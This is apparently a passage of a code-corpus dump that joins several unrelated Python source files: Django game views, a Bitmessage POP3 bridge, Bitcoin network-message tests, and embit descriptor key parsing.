self.offeror_bond is not None) or False
offeree = (self._offeree_has_resources() or self.offeree_territory is not None or \
self.offeree_bond is not None) or False
return offeror ^ offeree
```
#### File: game/templatetags/game_tags.py
```python
from django import template
from game.config import Config
register = template.Library()
@register.simple_tag
def get_verbose_field_name(instance, field_name):
"""
Returns verbose_name for a field.
"""
return instance._meta.get_field(field_name).verbose_name.title()
@register.simple_tag
def get_field_value(instance, field_name):
"""
Returns verbose_name for a field.
"""
return getattr(instance, field_name)
@register.simple_tag
def current_game_date():
return Config.current_game_date()
@register.simple_tag
def to_game_date(date):
return Config.to_game_date(date)
```
#### File: ironandblood/game/views.py
```python
from django.core.exceptions import ValidationError
from django.core.urlresolvers import reverse
from django.contrib import messages
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import User
from django.db.models import Q
from django.http import HttpResponseRedirect
from django.shortcuts import render, render_to_response, redirect
from django.template import RequestContext
from django.utils.translation import ugettext_lazy as _
from django.views.decorators.csrf import csrf_protect
from .models import Player, Resources, Territory, Exchange, Bond
from .forms import ExchangeForm
def build_context(request, context = {}):
"""
Build a context dictionary with information for the base html page.
"""
ctx = {
'waiting_exchanges': Exchange.objects.filter(offeree = request.user,
state = Exchange.WAITING),
'pending_bonds': Bond.objects.filter(borrower = request.user,
state = Bond.PENDING),
}
ctx.update(context)
return ctx
@login_required(login_url='game:login')
@csrf_protect
def bonds(request, state=Bond.PENDING):
rb = Bond.objects.filter(holder = request.user).order_by('-pk')
sb = Bond.objects.filter(borrower = request.user).order_by('-pk')
states = list(state)
rb = rb.filter(state__in = states)
sb = sb.filter(state__in = states)
return render(request, 'game/bonds.html', build_context(request, {
'users': User.objects.all(),
'as_holder_bonds': rb,
'as_borrower_bonds': sb,
'states': states
}))
@login_required(login_url='game:login')
def update_bond(request, bond_pk):
if request.POST:
pay = 'pay' in request.POST
forgive = 'forgive' in request.POST
valid = pay ^ forgive
if valid:
try:
bond = Bond.objects.get(pk = bond_pk)
if pay:
bond.pay(user=request.user)
messages.success(request, _('Bond paid!'))
elif forgive:
bond.forgive(user=request.user)
messages.info(request, _('Bond forgiven.'))
else:
raise ValidationError(_('Unknown operation.'))
except ValidationError as e:
if e.params:
messages.error(request, e.message % e.params)
else:
messages.error(request, e.message)
return HttpResponseRedirect(reverse('game:bonds'))
@login_required(login_url='game:login')
def bond_by_user(request, username, state=Bond.PENDING):
user = User.objects.get(username = username)
users = [request.user, user]
bonds_history = Bond.objects.filter(holder__in = users,
borrower__in = users)
states = list(state)
bonds_history = bonds_history.filter(state__in = states)
return render(request, 'game/bond_by_user.html', build_context(request, {
'user': user,
'bonds_history': bonds_history,
'states': states
}))
@login_required(login_url='game:login')
@csrf_protect
def exchanges(request, state=Exchange.WAITING):
re = Exchange.objects.filter(offeree = request.user).order_by('-offer_date')
se = Exchange.objects.filter(offeror = request.user).order_by('-offer_date')
states = list(state)
re = re.filter(state__in = states)
se = se.filter(state__in = states)
return render(request, 'game/exchanges.html', build_context(request, {
'users': User.objects.all(),
'received_exchanges': re,
'sent_exchanges': se,
'states': states
}))
@login_required(login_url='game:login')
def update_exchange(request, exchange_pk):
if request.POST:
accept = 'accept' in request.POST
reject = 'reject' in request.POST
cancel = 'cancel' in request.POST
valid = accept ^ reject ^ cancel
if valid:
try:
exch = Exchange.objects.get(pk = exchange_pk)
if accept:
exch.accept(user=request.user)
messages.success(request, _('Exchange accepted!'))
elif reject:
exch.reject(user=request.user)
messages.info(request, _('Exchange rejected.'))
elif cancel:
exch.cancel(user=request.user)
messages.info(request, _('Exchange canceled.'))
else:
raise ValidationError(_('Unknown operation.'))
except ValidationError as e:
if e.params:
messages.error(request, e.message % e.params)
else:
messages.error(request, e.message)
return HttpResponseRedirect(reverse('game:exchanges'))
@login_required(login_url='game:login')
def new_exchange(request, offeree, state=Exchange.WAITING):
offeree_obj = User.objects.get(username = offeree)
form = ExchangeForm(request.user, offeree_obj, request.POST or None)
error_message = None
if form.is_valid():
try:
id_offeror_territory = request.POST['id_offeror_territory']
id_offeree_territory = request.POST['id_offeree_territory']
resource = form.build_and_offer(request.user, offeree_obj,
id_offeror_territory = id_offeror_territory,
id_offeree_territory = id_offeree_territory)
except ValidationError as e:
if e.params:
messages.error(request, e.message % e.params)
else:
messages.error(request, e.message)
else:
messages.success(request, _('Exchange offer sent!'))
return HttpResponseRedirect(reverse('game:exchanges'))
users = [request.user, offeree_obj]
exchange_history = Exchange.objects.filter(offeror__in = users,
offeree__in = users)
states = list(state)
exchange_history = exchange_history.filter(state__in = states)
return render(request, 'game/new_exchange.html', build_context(request, {
'form': form,
'offeree': offeree_obj,
'territories': Territory.objects.all(),
'exchange_history': exchange_history,
'states': states
}))
@login_required(login_url='game:login')
def home(request):
territories = Territory.objects.all()
users = User.objects.all()
colors = ['#659BA3', '#725E54', '#FFEBB5', '#996982', '#01704B']
dct = dict()
for t in territories:
dct[t.code] = colors[t.owner.pk % len(colors)]
user_legend = dict()
for u in users:
user_legend[u.username] = colors[u.pk % len(colors)]
return render(request, 'game/home.html', build_context(request, {
'colors': dct,
'colors_legend': user_legend
}))
@login_required(login_url='game:login')
def logout_view(request):
logout(request)
return redirect(reverse('game:login'))
def login_view(request):
state = _("Please log in above.")
alert_type = 'info'
username = password = ''
if request.POST:
username = request.POST['username']
password = request.POST['password']
user = authenticate(username=username, password=password)
if user is not None:
if user.is_active:
login(request, user)
return redirect(request.GET.get('next', '/'))
else:
alert_type = 'danger'
state = _("Your account is not active, please contact the site admin.")
else:
alert_type = 'danger'
state = _("Your username and/or password were incorrect.")
context = {'alert_type': alert_type, 'state': state, 'username': username}
return render_to_response('game/login.html', RequestContext(request, context))
@login_required(login_url='game:login')
def profile(request):
return render(request, 'game/home.html', {})
``` |
{
"source": "jimmysong/bmwrapper",
"score": 2
} |
#### File: jimmysong/bmwrapper/incoming.py
```python
import socket
import threading
import email.mime.text
import email.mime.image
import email.mime.multipart
import email.header
import bminterface
import re
import select
import logging
class ChatterboxConnection(object):
END = "\r\n"
def __init__(self, conn):
self.conn = conn
def __getattr__(self, name):
return getattr(self.conn, name)
def sendall(self, data, END=END):
data += END
self.conn.sendall(data)
def recvall(self, END=END):
data = []
while True:
chunk = self.conn.recv(4096)
if END in chunk:
data.append(chunk[:chunk.index(END)])
break
data.append(chunk)
if len(data) > 1:
pair = data[-2] + data[-1]
if END in pair:
data[-2] = pair[:pair.index(END)]
data.pop()
break
return "".join(data)
def handleUser(data):
return "+OK user accepted"
def handlePass(data):
return "+OK pass accepted"
def _getMsgSizes():
msgCount = bminterface.listMsgs()
msgSizes = []
for msgID in range(msgCount):
logging.debug("Parsing msg %i of %i" % (msgID+1, msgCount))
dateTime, toAddress, fromAddress, subject, body = bminterface.get(msgID)
msgSizes.append(len(makeEmail(dateTime, toAddress, fromAddress, subject, body)))
return msgSizes
def handleStat(data):
msgSizes = _getMsgSizes()
msgCount = len(msgSizes)
msgSizeTotal = 0
for msgSize in msgSizes:
msgSizeTotal += msgSize
returnData = '+OK %i %i' % (msgCount, msgSizeTotal)
logging.debug("Answering STAT: %i %i" % (msgCount, msgSizeTotal))
return returnData
def handleList(data):
cmd, msgId = data.split()
msgSizes = _getMsgSizes()
if msgId is not None:
# means the server wants a single message response
i = int(msgId) - 1
if i >= len(msgSizes):
return "-ERR no such message"
else:
msgSize = msgSizes[i]
return "+OK %s %s" % (msgId, msgSize)
msgCount = 0
returnDataPart2 = ''
msgSizeTotal = 0
for msgSize in msgSizes:
msgSizeTotal += msgSize
msgCount += 1
returnDataPart2 += '%i %i\r\n' % (msgCount, msgSize)
returnDataPart2 += '.'
returnDataPart1 = '+OK %i messages (%i octets)\r\n' % (msgCount, msgSizeTotal)
returnData = returnDataPart1 + returnDataPart2
logging.debug("Answering LIST: %i %i" % (msgCount, msgSizeTotal))
logging.debug(returnData)
return returnData
def handleTop(data):
msg = 'test'
logging.debug(data.split())
cmd, msgID, lines = data.split()
msgID = int(msgID)-1
lines = int(lines)
logging.debug(lines)
dateTime, toAddress, fromAddress, subject, body = bminterface.get(msgID)
logging.debug(subject)
msg = makeEmail(dateTime, toAddress, fromAddress, subject, body)
top, bot = msg.split("\n\n", 1)
#text = top + "\r\n\r\n" + "\r\n".join(bot[:lines])
return "+OK top of message follows\r\n%s\r\n." % top
def handleRetr(data):
logging.debug(data.split())
msgID = int(data.split()[1])-1
dateTime, toAddress, fromAddress, subject, body = bminterface.get(msgID)
msg = makeEmail(dateTime, toAddress, fromAddress, subject, body)
return "+OK %i octets\r\n%s\r\n." % (len(msg), msg)
def handleDele(data):
msgID = int(data.split()[1])-1
bminterface.markForDelete(msgID)
return "+OK I'll try..."
def handleNoop(data):
return "+OK"
def handleQuit(data):
bminterface.cleanup()
return "+OK just pretend I'm gone"
def handleCapa(data):
returnData = "+OK List of capabilities follows\r\n"
returnData += "CAPA\r\nTOP\r\nUSER\r\nPASS\r\nUIDL\r\n."
return returnData
def handleUIDL(data):
data = data.split()
logging.debug(data)
if len(data) == 1:
refdata = bminterface.getUIDLforAll()
else:
refdata = bminterface.getUIDLforSingle(int(data[1])-1)
logging.debug(refdata)
if len(refdata) == 1:
returnData = '+OK ' + data[0] + str(refdata[0])
else:
returnData = '+OK listing UIDL numbers...\r\n'
for msgID in range(len(refdata)):
returnData += str(msgID+1) + ' ' + refdata[msgID] + '\r\n'
returnData += '.'
return returnData
def makeEmail(dateTime, toAddress, fromAddress, subject, body):
body = parseBody(body)
msgType = len(body)
if msgType == 1:
msg = email.mime.text.MIMEText(body[0], 'plain', 'UTF-8')
else:
msg = email.mime.multipart.MIMEMultipart('mixed')
bodyText = email.mime.text.MIMEText(body[0], 'plain', 'UTF-8')
body = body[1:]
msg.attach(bodyText)
for item in body:
img = 0
itemType, itemData = [0], [0]
try:
itemType, itemData = item.split(';', 1)
itemType = itemType.split('/', 1)
except:
logging.warning("Could not parse message type")
pass
if itemType[0] == 'image':
try:
itemDataFinal = itemData.lstrip('base64,').strip(' ').strip('\n').decode('base64')
img = email.mime.image.MIMEImage(itemDataFinal)
except:
#Some images don't auto-detect type correctly with email.mime.image
#Namely, jpegs with embeded color profiles look problematic
#Trying to set it manually...
try:
itemDataFinal = itemData.lstrip('base64,').strip(' ').strip('\n').decode('base64')
img = email.mime.image.MIMEImage(itemDataFinal, _subtype=itemType[1])
except:
logging.warning("Failed to parse image data. This could be an image.")
logging.warning("This could be from an image tag filled with junk data.")
logging.warning("It could also be a python email.mime.image problem.")
if img:
img.add_header('Content-Disposition', 'attachment')
msg.attach(img)
msg['To'] = toAddress
msg['From'] = fromAddress
msg['Subject'] = email.header.Header(subject, 'UTF-8')
msg['Date'] = dateTime
return msg.as_string()
def parseBody(body):
returnData = []
text = ''
searchString = '<img[^>]*'
attachment = re.search(searchString, body)
while attachment:
imageCode = body[attachment.start():attachment.end()]
imageDataRange = re.search('src=[\"\'][^\"\']*[\"\']', imageCode)
imageData=''
if imageDataRange:
try:
imageData = imageCode[imageDataRange.start()+5:imageDataRange.end()-1].lstrip('data:')
except:
pass
if imageData:
returnData.append(imageData)
body = body[:attachment.start()] + body[attachment.end()+1:]
attachment = re.search(searchString, body)
text = body
returnData = [text] + returnData
return returnData
dispatch = dict(
USER=handleUser,
PASS=handlePass,
STAT=handleStat,
LIST=handleList,
TOP=handleTop,
RETR=handleRetr,
DELE=handleDele,
NOOP=handleNoop,
QUIT=handleQuit,
CAPA=handleCapa,
UIDL=handleUIDL,
)
def incomingServer(host, port, run_event):
popthread = threading.Thread(target=incomingServer_main, args=(host, port, run_event))
popthread.daemon = True
popthread.start()
return popthread
def incomingServer_main(host, port, run_event):
sock = None
try:
while run_event.is_set():
if sock is None:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind((host, port))
sock.listen(1)
ready = select.select([sock], [], [], .2)
if ready[0]:
conn, addr = sock.accept()
# stop listening, one client only
sock.close()
sock = None
try:
conn = ChatterboxConnection(conn)
conn.sendall("+OK server ready")
while run_event.is_set():
data = conn.recvall()
command = data.split(None, 1)[0]
try:
cmd = dispatch[command]
except KeyError:
conn.sendall("-ERR unknown command")
else:
conn.sendall(cmd(data))
if cmd is handleQuit:
break
finally:
conn.close()
except (SystemExit, KeyboardInterrupt):
pass
except Exception, ex:
raise
finally:
if sock is not None:
sock.close()
``` |
{
"source": "jimmysong/buidl-python",
"score": 2
} |
#### File: buidl/test/test_network.py
```python
from unittest import TestCase
from io import BytesIO
from buidl.block import Block
from buidl.helper import decode_base58, decode_gcs
from buidl.network import (
BASIC_FILTER_TYPE,
CFCheckPointMessage,
CFHeadersMessage,
CFilterMessage,
FILTERED_BLOCK_DATA_TYPE,
GetDataMessage,
GetHeadersMessage,
GetCFCheckPointMessage,
GetCFHeadersMessage,
GetCFiltersMessage,
HeadersMessage,
NetworkEnvelope,
SimpleNode,
VersionMessage,
)
class NetworkEnvelopeTest(TestCase):
def test_parse(self):
msg = bytes.fromhex("f9beb4d976657261636b000000000000000000005df6e0e2")
stream = BytesIO(msg)
envelope = NetworkEnvelope.parse(stream)
self.assertEqual(envelope.command, b"verack")
self.assertEqual(envelope.payload, b"")
msg = bytes.fromhex(
"f9beb4d976657273696f6e0000000000650000005f1a69d2721101000100000000000000bc8f5e5400000000010000000000000000000000000000000000ffffc61b6409208d010000000000000000000000000000000000ffffcb0071c0208d128035cbc97953f80f2f5361746f7368693a302e392e332fcf05050001"
)
stream = BytesIO(msg)
envelope = NetworkEnvelope.parse(stream)
self.assertEqual(envelope.command, b"version")
self.assertEqual(envelope.payload, msg[24:])
def test_serialize(self):
msg = bytes.fromhex("f9beb4d976657261636b000000000000000000005df6e0e2")
stream = BytesIO(msg)
envelope = NetworkEnvelope.parse(stream)
self.assertEqual(envelope.serialize(), msg)
msg = bytes.fromhex(
"f9beb4d976657273696f6e0000000000650000005f1a69d2721101000100000000000000bc8f5e5400000000010000000000000000000000000000000000ffffc61b6409208d010000000000000000000000000000000000ffffcb0071c0208d128035cbc97953f80f2f5361746f7368693a302e392e332fcf05050001"
)
stream = BytesIO(msg)
envelope = NetworkEnvelope.parse(stream)
self.assertEqual(envelope.serialize(), msg)
class VersionMessageTest(TestCase):
def test_serialize(self):
v = VersionMessage(timestamp=0, nonce=b"\x00" * 8)
self.assertEqual(
v.serialize().hex(),
"7f11010000000000000000000000000000000000000000000000000000000000000000000000ffff000000008d20000000000000000000000000000000000000ffff000000008d2000000000000000001b2f70726f6772616d6d696e67626c6f636b636861696e3a302e312f0000000001",
)
class GetHeadersMessageTest(TestCase):
def test_serialize(self):
block_hex = "0000000000000000001237f46acddf58578a37e213d2a6edc4884a2fcad05ba3"
gh = GetHeadersMessage(start_block=bytes.fromhex(block_hex))
self.assertEqual(
gh.serialize().hex(),
"7f11010001a35bd0ca2f4a88c4eda6d213e2378a5758dfcd6af437120000000000000000000000000000000000000000000000000000000000000000000000000000000000",
)
class HeadersMessageTest(TestCase):
def test_parse(self):
hex_msg = "0200000020df3b053dc46f162a9b00c7f0d5124e2676d47bbe7c5d0793a500000000000000ef445fef2ed495c275892206ca533e7411907971013ab83e3b47bd0d692d14d4dc7c835b67d8001ac157e670000000002030eb2540c41025690160a1014c577061596e32e426b712c7ca00000000000000768b89f07044e6130ead292a3f51951adbd2202df447d98789339937fd006bd44880835b67d8001ade09204600"
stream = BytesIO(bytes.fromhex(hex_msg))
headers = HeadersMessage.parse(stream)
self.assertEqual(len(headers.headers), 2)
for b in headers.headers:
self.assertEqual(b.__class__, Block)
class GetDataMessageTest(TestCase):
def test_serialize(self):
hex_msg = "020300000030eb2540c41025690160a1014c577061596e32e426b712c7ca00000000000000030000001049847939585b0652fba793661c361223446b6fc41089b8be00000000000000"
get_data = GetDataMessage()
block1 = bytes.fromhex(
"00000000000000cac712b726e4326e596170574c01a16001692510c44025eb30"
)
get_data.add_data(FILTERED_BLOCK_DATA_TYPE, block1)
block2 = bytes.fromhex(
"00000000000000beb88910c46f6b442312361c6693a7fb52065b583979844910"
)
get_data.add_data(FILTERED_BLOCK_DATA_TYPE, block2)
self.assertEqual(get_data.serialize().hex(), hex_msg)
# FIXME: make this work
# Getting: ConnectionRefusedError: [Errno 61] Connection refused
if False:
class SimpleNodeTest(TestCase):
def test_handshake(self):
node = SimpleNode("tbtc.programmingblockchain.com", testnet=True)
node.handshake()
def test_get_filtered_txs(self):
from buidl.bloomfilter import BloomFilter
bf = BloomFilter(30, 5, 90210)
h160 = decode_base58("mseRGXB89UTFVkWJhTRTzzZ9Ujj4ZPbGK5")
bf.add(h160)
node = SimpleNode("tbtc.programmingblockchain.com", testnet=True)
node.handshake()
node.send(bf.filterload())
block_hash = bytes.fromhex(
"00000000000377db7fde98411876c53e318a395af7304de298fd47b7c549d125"
)
txs = node.get_filtered_txs([block_hash])
self.assertEqual(
txs[0].id(),
"0c024b9d3aa2ae8faae96603b8d40c88df2fc6bf50b3f446295206f70f3cf6ad",
)
self.assertEqual(
txs[1].id(),
"0886537e27969a12478e0d33707bf6b9fe4fdaec8d5d471b5304453b04135e7e",
)
self.assertEqual(
txs[2].id(),
"23d4effc88b80fb7dbcc2e6a0b0af9821c6fe3bb4c8dc3b61bcab7c45f0f6888",
)
class CFilterTest(TestCase):
def test_cfilter(self):
stop_hash = bytes.fromhex(
"000000006f27ddfe1dd680044a34548f41bed47eba9e6f0b310da21423bc5f33"
)
getcfilters = GetCFiltersMessage(stop_hash=stop_hash)
expected = b"\x00\x01\x00\x00\x00" + stop_hash[::-1]
self.assertEqual(getcfilters.serialize(), expected)
expected = (
b"\x00" + stop_hash[::-1] + b"\x09" + bytes.fromhex("0385acb4f0fe889ef0")
)
cfilter = CFilterMessage.parse(BytesIO(expected))
self.assertEqual(cfilter.filter_type, 0)
self.assertEqual(cfilter.block_hash, stop_hash)
self.assertEqual(cfilter.hashes, {1341840, 1483084, 570774})
self.assertEqual(cfilter.hash(b"\x00"), 1322199)
included = bytes.fromhex(
"002027a5000c7917f785d8fc6e5a55adfca8717ecb973ebb7743849ff956d896a7ed"
)
self.assertTrue([included] in cfilter)
self.assertFalse([b"\x00"] in cfilter)
with self.assertRaises(RuntimeError):
GetCFiltersMessage()
def test_cfilter_without_network(self):
# Example from Trezor Blog Post (https://blog.trezor.io/bip158-compact-block-filters-9b813b07a878)
block_hash_hex = (
"000000000000015d6077a411a8f5cc95caf775ccf11c54e27df75ce58d187313"
)
filter_hex = "09027acea61b6cc3fb33f5d52f7d088a6b2f75d234e89ca800"
key = bytes.fromhex(block_hash_hex)[::-1][:16]
filter_bytes = bytes.fromhex(filter_hex)
cfilter = CFilterMessage(
filter_type=BASIC_FILTER_TYPE,
block_hash=bytes.fromhex(block_hash_hex),
filter_bytes=filter_bytes,
hashes=decode_gcs(key, filter_bytes),
)
for script, want in (
("76a9143ebc40e411ed3c76f86711507ab952300890397288ac", True),
("76a914c01a7ca16b47be50cbdbc60724f701d52d75156688ac", True),
("76a914000000000000000000000000000000000000000088ac", False), # made up
):
self.assertEqual(bytes.fromhex(script) in cfilter, want)
class CFHeaderTest(TestCase):
def test_cfheader(self):
stop_hash = bytes.fromhex(
"000000006f27ddfe1dd680044a34548f41bed47eba9e6f0b310da21423bc5f33"
)
getcfheaders = GetCFHeadersMessage(stop_hash=stop_hash)
self.assertEqual(
getcfheaders.serialize(), b"\x00\x00\x00\x00\x00" + stop_hash[::-1]
)
hash2 = b"\x00" * 32
stream = BytesIO(
bytes.fromhex(
"00335fbc2314a20d310b6f9eba7ed4be418f54344a0480d61dfedd276f000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000"
)
)
cfheaders = CFHeadersMessage.parse(stream)
self.assertEqual(cfheaders.filter_type, 0)
self.assertEqual(cfheaders.stop_hash, stop_hash)
self.assertEqual(cfheaders.previous_filter_header, hash2)
self.assertEqual(cfheaders.filter_hashes, [hash2])
with self.assertRaises(RuntimeError):
GetCFHeadersMessage()
class CFCheckPointTest(TestCase):
def test_cfcheckpoint(self):
stop_hash = bytes.fromhex(
"000000006f27ddfe1dd680044a34548f41bed47eba9e6f0b310da21423bc5f33"
)
getcfcheckpoints = GetCFCheckPointMessage(stop_hash=stop_hash)
self.assertEqual(getcfcheckpoints.serialize(), b"\x00" + stop_hash[::-1])
hash2 = b"\x00" * 32
stream = BytesIO(
bytes.fromhex(
"00335fbc2314a20d310b6f9eba7ed4be418f54344a0480d61dfedd276f00000000010000000000000000000000000000000000000000000000000000000000000000000000"
)
)
cfcheckpoints = CFCheckPointMessage.parse(stream)
self.assertEqual(cfcheckpoints.filter_type, 0)
self.assertEqual(cfcheckpoints.stop_hash, stop_hash)
self.assertEqual(cfcheckpoints.filter_headers, [hash2])
with self.assertRaises(RuntimeError):
GetCFCheckPointMessage()
``` |
{
"source": "jimmysong/embit",
"score": 3
} |
#### File: embit/descriptor/arguments.py
```python
from binascii import hexlify, unhexlify
from .base import DescriptorBase, read_until
from .errors import ArgumentError
from .. import bip32, ec, compact, hashes
class KeyOrigin:
def __init__(self, fingerprint: bytes, derivation: list):
self.fingerprint = fingerprint
self.derivation = derivation
@classmethod
def from_string(cls, s: str):
arr = s.split("/")
mfp = unhexlify(arr[0])
assert len(mfp) == 4
arr[0] = "m"
path = "/".join(arr)
derivation = bip32.parse_path(path)
return cls(mfp, derivation)
def __str__(self):
return bip32.path_to_str(self.derivation, fingerprint=self.fingerprint)
class AllowedDerivation(DescriptorBase):
# xpub/{0,1}/* - {0,1} is a set of allowed branches, wildcard * is stored as None
def __init__(self, indexes=[[0, 1], None]):
# check only one wildcard and only one set is in the derivation
if len([i for i in indexes if i is None]) > 1:
raise ArgumentError("Only one wildcard is allowed")
if len([i for i in indexes if isinstance(i, list)]) > 1:
raise ArgumentError("Only one wildcard is allowed")
self.indexes = indexes
@property
def is_wildcard(self):
return None in self.indexes
def fill(self, idx, branch_index=None):
# None is ok
if idx is not None and (idx < 0 or idx >= 0x80000000):
raise ArgumentError("Hardened indexes are not allowed in wildcard")
arr = [i for i in self.indexes]
for i, el in enumerate(arr):
if el is None:
arr[i] = idx
if isinstance(el, list):
if branch_index is None:
arr[i] = el[0]
else:
if branch_index < 0 or branch_index >= len(el):
raise ArgumentError("Invalid branch index")
arr[i] = el[branch_index]
return arr
def branch(self, branch_index):
arr = self.fill(None, branch_index)
return type(self)(arr)
def check_derivation(self, derivation: list):
if len(derivation) != len(self.indexes):
return None
branch_idx = 0 # default branch if no branches in descriptor
idx = None
for i, el in enumerate(self.indexes):
der = derivation[i]
if isinstance(el, int):
if el != der:
return None
# branch
elif isinstance(el, list):
if der not in el:
return None
branch_idx = el.index(der)
# wildcard
elif el is None:
idx = der
# shouldn't happen
else:
raise ArgumentError("Strange derivation index...")
if branch_idx is not None and idx is not None:
return branch_idx, idx
@classmethod
def default(cls):
return AllowedDerivation([[0, 1], None])
@property
def branches(self):
for el in self.indexes:
if isinstance(el, list):
return el
return None
@property
def has_hardend(self):
for idx in self.indexes:
if isinstance(idx, int) and idx >= 0x80000000:
return True
if isinstance(idx, list) and len([i for i in idx if i >= 0x80000000]) > 0:
return True
return False
@classmethod
def from_string(cls, der: str, allow_hardened=False, allow_set=True):
if len(der) == 0:
return None
indexes = [
cls.parse_element(d, allow_hardened, allow_set) for d in der.split("/")
]
return cls(indexes)
@classmethod
def parse_element(cls, d: str, allow_hardened=False, allow_set=True):
# wildcard
if d == "*":
return None
# branch set
if d[0] == "{" and d[-1] == "}":
if not allow_set:
raise ArgumentError("Set is not allowed in derivation %s" % d)
return [
cls.parse_element(dd, allow_hardened, allow_set=False)
for dd in d[1:-1].split(",")
]
idx = 0
if d[-1] == "h":
if not allow_hardened:
raise ArgumentError("Hardened derivation is not allowed in %s" % d)
idx = 0x80000000
d = d[:-1]
i = int(d)
if i < 0 or i >= 0x80000000:
raise ArgumentError("Derivation index can be in a range [0, 0x80000000)")
return idx + i
def __str__(self):
r = ""
for idx in self.indexes:
if idx is None:
r += "/*"
if isinstance(idx, int):
if idx >= 0x80000000:
r += "/%dh" % (idx - 0x80000000)
else:
r += "/%d" % idx
if isinstance(idx, list):
r += "/{"
r += ",".join(
[
str(i) if i < 0x80000000 else str(i - 0x80000000) + "h"
for i in idx
]
)
r += "}"
return r
class Key(DescriptorBase):
def __init__(self, key, origin=None, derivation=None):
self.origin = origin
self.key = key
if not hasattr(key, "derive") and derivation is not None:
raise ArgumentError("Key %s doesn't support derivation" % key)
self.allowed_derivation = derivation
def __len__(self):
return 34 # <33:sec> - only compressed pubkeys
@property
def fingerprint(self):
return None if self.origin is None else self.origin.fingerprint
@property
def derivation(self):
return [] if self.origin is None else self.origin.derivation
@classmethod
def read_from(cls, s):
first = s.read(1)
origin = None
if first == b"[":
prefix, char = read_until(s, b"]")
if char != b"]":
raise ArgumentError("Invalid key - missing ]")
origin = KeyOrigin.from_string(prefix.decode())
else:
s.seek(-1, 1)
k, char = read_until(s, b",)/")
der = b""
# there is a following derivation
if char == b"/":
der, char = read_until(s, b"{,)")
# we get a set of possible branches: {a,b,c...}
if char == b"{":
der += b"{"
branch, char = read_until(s, b"}")
if char is None:
raise ArgumentError("Failed reading the key, missing }")
der += branch + b"}"
rest, char = read_until(s, b",)")
der += rest
if char is not None:
s.seek(-1, 1)
# parse key
k = cls.parse_key(k)
# parse derivation
allow_hardened = isinstance(k, bip32.HDKey) and isinstance(k.key, ec.PrivateKey)
derivation = AllowedDerivation.from_string(
der.decode(), allow_hardened=allow_hardened
)
return cls(k, origin, derivation)
@classmethod
def parse_key(cls, k: bytes):
# convert to string
k = k.decode()
if len(k) in [66, 130] and k[:2] in ["02", "03", "04"]:
# bare public key
return ec.PublicKey.parse(unhexlify(k))
elif k[1:4] in ["pub", "prv"]:
# bip32 key
return bip32.HDKey.from_base58(k)
else:
return ec.PrivateKey.from_wif(k)
@property
def is_extended(self):
return isinstance(self.key, bip32.HDKey)
def check_derivation(self, derivation_path):
if self.origin is None:
return None
if self.fingerprint != derivation_path.fingerprint:
return None
origin = self.origin.derivation
if origin == derivation_path.derivation[: len(origin)]:
rest = derivation_path.derivation[len(origin) :]
if self.allowed_derivation is None:
return None
return self.allowed_derivation.check_derivation(rest)
def sec(self):
return self.key.sec()
def serialize(self):
return self.sec()
def compile(self):
d = self.serialize()
return compact.to_bytes(len(d)) + d
@property
def prefix(self):
if self.origin:
return "[%s]" % self.origin
return ""
@property
def suffix(self):
return "" if self.allowed_derivation is None else str(self.allowed_derivation)
@property
def can_derive(self):
return self.allowed_derivation is not None and hasattr(self.key, "derive")
@property
def branches(self):
return self.allowed_derivation.branches if self.allowed_derivation else None
@property
def num_branches(self):
return 1 if self.branches is None else len(self.branches)
def branch(self, branch_index=None):
der = self.allowed_derivation.branch(branch_index)
return type(self)(self.key, self.origin, der)
@property
def is_wildcard(self):
return self.allowed_derivation.is_wildcard if self.allowed_derivation else False
def derive(self, idx, branch_index=None):
# nothing to derive
if self.allowed_derivation is None:
return self
der = self.allowed_derivation.fill(idx, branch_index=branch_index)
k = self.key.derive(der)
if self.origin:
origin = KeyOrigin(self.origin.fingerprint, self.origin.derivation + der)
else:
origin = KeyOrigin(self.key.child(0).fingerprint, der)
# empty derivation
derivation = None
return type(self)(k, origin, derivation)
@property
def is_private(self):
return isinstance(self.key, ec.PrivateKey) or (
self.is_extended and self.key.is_private
)
@property
def private_key(self):
if not self.is_private:
raise ArgumentError("Key is not private")
# either HDKey.key or just the key
return self.key.key if self.is_extended else self.key
@property
def secret(self):
return self.private_key.secret
def to_string(self, version=None):
if isinstance(self.key, ec.PublicKey):
return self.prefix + hexlify(self.key.sec()).decode()
if isinstance(self.key, bip32.HDKey):
return self.prefix + self.key.to_base58(version) + self.suffix
if isinstance(self.key, ec.PrivateKey):
return self.prefix + self.key.wif()
return self.prefix + self.key
@classmethod
def from_string(cls, s):
return cls.parse(s.encode())
class KeyHash(Key):
@classmethod
def parse_key(cls, k: bytes):
# convert to string
k = k.decode()
# raw 20-byte hash
if len(k) == 40:
return k
if len(k) in [66, 130] and k[:2] in ["02", "03", "04"]:
# bare public key
return ec.PublicKey.parse(unhexlify(k))
elif k[1:4] in ["pub", "prv"]:
# bip32 key
return bip32.HDKey.from_base58(k)
else:
return ec.PrivateKey.from_wif(k)
def serialize(self):
if isinstance(self.key, str):
return unhexlify(self.key)
return hashes.hash160(self.key.sec())
def __len__(self):
return 21 # <20:pkh>
def compile(self):
d = self.serialize()
return compact.to_bytes(len(d)) + d
class Number(DescriptorBase):
def __init__(self, num):
self.num = num
@classmethod
def read_from(cls, s):
num = 0
char = s.read(1)
while char in b"0123456789":
num = 10 * num + int(char.decode())
char = s.read(1)
s.seek(-1, 1)
return cls(num)
def compile(self):
if self.num == 0:
return b"\x00"
if self.num <= 16:
return bytes([80 + self.num])
b = self.num.to_bytes(32, "little").rstrip(b"\x00")
if b[-1] >= 128:
b += b"\x00"
return bytes([len(b)]) + b
def __len__(self):
return len(self.compile())
def __str__(self):
return "%d" % self.num
class Raw(DescriptorBase):
def __init__(self, raw):
if len(raw) != self.LEN * 2:
raise ArgumentError("Invalid raw element length: %d" % len(raw))
self.raw = unhexlify(raw)
@classmethod
def read_from(cls, s):
return cls(s.read(2 * cls.LEN).decode())
def __str__(self):
return hexlify(self.raw).decode()
def compile(self):
return compact.to_bytes(len(self.raw)) + self.raw
def __len__(self):
return len(compact.to_bytes(self.LEN)) + self.LEN
class Raw32(Raw):
LEN = 32
def __len__(self):
return 33
class Raw20(Raw):
LEN = 20
def __len__(self):
return 21
``` |
{
"source": "jimmysong/fabric",
"score": 2
} |
#### File: fabric/tests/test_parallel.py
```python
from __future__ import with_statement
